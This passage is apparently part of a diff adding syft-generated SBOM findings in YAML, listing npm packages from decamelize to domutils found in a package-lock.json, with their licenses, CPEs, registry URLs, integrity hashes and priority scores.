is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6cb9876ddd023a8b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: decamelize 1.2.0' + title: decamelize 1.2.0 + description: 'Package discovered: decamelize 1.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 56044f762e36d59b + name: decamelize + version: 1.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:decamelize:decamelize:1.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/decamelize@1.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz + integrity: sha512-z2S+W9X73hAUUki+N+9Za2lBlun89zigOyGrsax+KUQ6wKW4ZoWpEYBkGhQjwAjjDCkWxhY0VKEhk8wzY7F5cA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2d9026954da43a27 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: decimal.js-light 2.5.1' + title: decimal.js-light 2.5.1 + description: 'Package discovered: decimal.js-light 2.5.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6135efdaaf1822bb + name: decimal.js-light + version: 2.5.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:decimal.js-light:decimal.js-light:2.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:decimal.js-light:decimal.js_light:2.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:decimal.js_light:decimal.js-light:2.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:decimal.js_light:decimal.js_light:2.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:decimal.js:decimal.js-light:2.5.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:decimal.js:decimal.js_light:2.5.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/decimal.js-light@2.5.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/decimal.js-light/-/decimal.js-light-2.5.1.tgz + integrity: sha512-qIMFpTMZmny+MMIitAB6D7iVPEorVw6YQRWkvarTkT4tBeSLLiHzcwj6q0MmYSFCiVpiqPJTJEYIrpcPzVEIvg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8e421fc3fe27aa9c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: deepmerge 4.3.1' + title: deepmerge 4.3.1 + description: 'Package discovered: deepmerge 4.3.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6fcde9d497e83e33 + name: deepmerge + version: 4.3.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:deepmerge:deepmerge:4.3.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/deepmerge@4.3.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz + integrity: sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: bd6d6c864c2f97b9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: delayed-stream 1.0.0' + title: delayed-stream 1.0.0 + description: 'Package discovered: delayed-stream 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c23340a58ec36159 + name: delayed-stream + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:delayed-stream:delayed-stream:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:delayed-stream:delayed_stream:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:delayed_stream:delayed-stream:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:delayed_stream:delayed_stream:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:delayed:delayed-stream:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:delayed:delayed_stream:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/delayed-stream@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz + integrity: sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b4af690e8812705b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: denque 2.1.0' + title: denque 2.1.0 + description: 'Package discovered: denque 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b292c74570fb7df3 + name: denque + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:denque:denque:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/denque@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/denque/-/denque-2.1.0.tgz + integrity: sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 86dec3bfd9bed666 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: depd 2.0.0' + title: depd 2.0.0 + description: 'Package discovered: depd 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 82a407fce3facea3 + name: depd + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:depd:depd:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/depd@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/depd/-/depd-2.0.0.tgz + integrity: sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a7d6bc7c01ff6fdb + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: destroy 1.2.0' + title: destroy 1.2.0 + description: 'Package discovered: destroy 1.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 916ee50fe6c61deb + name: destroy + version: 1.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:destroy:destroy:1.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/destroy@1.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz + integrity: sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b1baa34830820f96 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: detect-libc 2.1.2' + title: detect-libc 2.1.2 + description: 'Package discovered: detect-libc 2.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: cd3c75639d40cfa6 + name: detect-libc + version: 2.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:detect-libc:detect-libc:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:detect-libc:detect_libc:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:detect_libc:detect-libc:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:detect_libc:detect_libc:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:detect:detect-libc:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:detect:detect_libc:2.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/detect-libc@2.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz + integrity: sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d9872bdf37f54c1c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: dfa 1.2.0' + title: dfa 1.2.0 + description: 'Package discovered: dfa 1.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 32140b01170f2db8 + name: dfa + version: 1.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:dfa:dfa:1.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/dfa@1.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz + integrity: sha512-ED3jP8saaweFTjeGX8HQPjeC1YYyZs98jGNZx6IiBvxW7JG5v492kamAQB3m2wop07CvU/RQmzcKr6bgcC5D/Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9f98c7e106363761 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: didyoumean 1.2.2' + title: didyoumean 1.2.2 + description: 'Package discovered: didyoumean 1.2.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 88295af7ba0997fd + name: didyoumean + version: 1.2.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:didyoumean:didyoumean:1.2.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/didyoumean@1.2.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/didyoumean/-/didyoumean-1.2.2.tgz + integrity: sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1b1c014679b0d671 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: dijkstrajs 1.0.3' + title: dijkstrajs 1.0.3 + description: 'Package discovered: dijkstrajs 1.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7a3b023286e84986 + name: dijkstrajs + version: 1.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:dijkstrajs:dijkstrajs:1.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/dijkstrajs@1.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.3.tgz + integrity: sha512-qiSlmBq9+BCdCA/L46dw8Uy93mloxsPSbwnm5yrKn2vMPiy8KyAskTF6zuV/j5BMsmOGZDPs7KjU+mjb670kfA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4fdc8b3106066f47 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: dlv 1.1.3' + title: dlv 1.1.3 + description: 'Package discovered: dlv 1.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6145214b9f2f7148 + name: dlv + version: 1.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:dlv:dlv:1.1.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/dlv@1.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/dlv/-/dlv-1.1.3.tgz + integrity: sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4d01289dd001e612 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: dom-helpers 5.2.1' + title: dom-helpers 5.2.1 + description: 'Package discovered: dom-helpers 5.2.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 22b93db9f5eba040 + name: dom-helpers + version: 5.2.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:dom-helpers:dom-helpers:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom-helpers:dom_helpers:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom_helpers:dom-helpers:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom_helpers:dom_helpers:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom:dom-helpers:5.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom:dom_helpers:5.2.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/dom-helpers@5.2.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz + integrity: sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA== + dependencies: + '@babel/runtime': ^7.8.7 + csstype: ^3.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 594471832719edc2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: dom-serializer 2.0.0' + title: dom-serializer 2.0.0 + description: 'Package discovered: dom-serializer 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f8e1d8922cf56c54 + name: dom-serializer + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:dom-serializer:dom-serializer:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom-serializer:dom_serializer:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom_serializer:dom-serializer:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom_serializer:dom_serializer:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom:dom-serializer:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:dom:dom_serializer:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/dom-serializer@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz + integrity: sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg== + dependencies: + domelementtype: ^2.3.0 + domhandler: ^5.0.2 + entities: ^4.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 04fd13748534548d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: domelementtype 2.3.0' + title: domelementtype 2.3.0 + description: 'Package discovered: domelementtype 2.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5df6e95fb09fce0c + name: domelementtype + version: 2.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-2-Clause + spdxExpression: BSD-2-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:domelementtype:domelementtype:2.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/domelementtype@2.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/domelementtype/-/domelementtype-2.3.0.tgz + integrity: sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 21e3025ed99f3f28 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: domhandler 5.0.3' + title: domhandler 5.0.3 + description: 'Package discovered: domhandler 5.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 952037d890bc80f6 + name: domhandler + version: 5.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-2-Clause + spdxExpression: BSD-2-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:domhandler:domhandler:5.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/domhandler@5.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz + integrity: sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w== + dependencies: + domelementtype: ^2.3.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d6dff11bd10e354b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: domutils 3.2.2' + title: domutils 3.2.2 + description: 'Package discovered: domutils 3.2.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1b9db533b6297450 + name: domutils + version: 3.2.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-2-Clause + spdxExpression: BSD-2-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:domutils:domutils:3.2.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/domutils@3.2.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/domutils/-/domutils-3.2.2.tgz + integrity: sha512-6kZKyUajlDuqlHKVX1w7gyslj9MPIXzIFiz/rGu35uC1wMi+kMhQwGhl4lt9unC9Vb9INnY9Z3/ZA3+FhASLaw== + dependencies: + dom-serializer: ^2.0.0 + domelementtype: ^2.3.0 + domhandler: ^5.0.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4726026d0ba78a1e + ruleId: 